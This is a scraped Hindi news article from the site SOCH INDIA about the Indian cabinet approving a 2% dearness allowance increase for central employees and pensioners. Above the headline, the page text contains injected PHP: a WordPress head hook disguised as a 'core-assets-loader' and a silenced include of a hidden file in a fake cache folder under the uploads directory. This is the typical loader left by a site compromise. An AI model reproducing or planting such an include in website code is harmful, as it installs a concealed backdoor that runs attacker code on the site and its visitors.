add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मोदी सरकार का केंद्रीय कर्मचारियों को बड़ा तोहफा, महंगाई भत्ते में 2 फीसदी की बढ़ोतरी – SOCH INDIA
Menu

राजनीति
मोदी सरकार का केंद्रीय कर्मचारियों को बड़ा तोहफा, महंगाई भत्ते में 2 फीसदी की बढ़ोतरी

nobanner

दिवाली से पहले केंद्र ने सरकारी कर्मचारियों और पेंशनपाने वालों के लिये 2.0 फीसदी महंगाई भत्ते और राहत को आज मंजूरी दे दी. इससे करीब 50.68 लाख केंद्रीय कर्मचारियों और 54.24 लाख पेंशन-भोगियों कोन फायद मिलेगा. केंद्रीय मंत्रिमंडल की बैठक में बेसिक वेतन का 2.0 फीसदी महंगाई भत्ता देने का फैसला किया गया. ये एक जुलाई 2016 से लागू होगा.

दो फीसदी महंगाई भत्ते (डीए) से 5,622.10 करोड़ रुपये का सालाना बोझ आएगा. पूरे आठ महीने (जुलाई-फरवरी) में देखा जाए तो कुल बोझ 3,748.06 करोड़ रुपये होगा.

इससे पहले, केंद्र सरकार ने इस साल मार्च में डीए छह प्रतिशत बढ़ाकर 125 प्रतिशत कर दिया था. बाद में सातवें वेतन आयोग की सिफारिशों के लागू होने से महंगाई भत्ते को मूल वेतन में मिला दिया गया. एक सरकारी बयान में कहा गया है, ‘‘केंद्रीय मंत्रिमंडल ने केंद्रीय कर्मचारियों के लिये महंगाई भत्ता और पेंशनभोगियों के लिये महंगाई राहत एक जुलाई 2016 से मूल वेतन का 2.0 प्रतिशत बढ़ाने को मंजूरी दी है. इसका मकसद बढ़ती महंगाई से कर्मचारियों को राहत उपलब्ध कराना है.

बयान के अनुसार महंगाई भत्ते में बढ़ोतरी सातवें वेतन आयोग की सिफारिशों के फार्मूले पर आधारित है.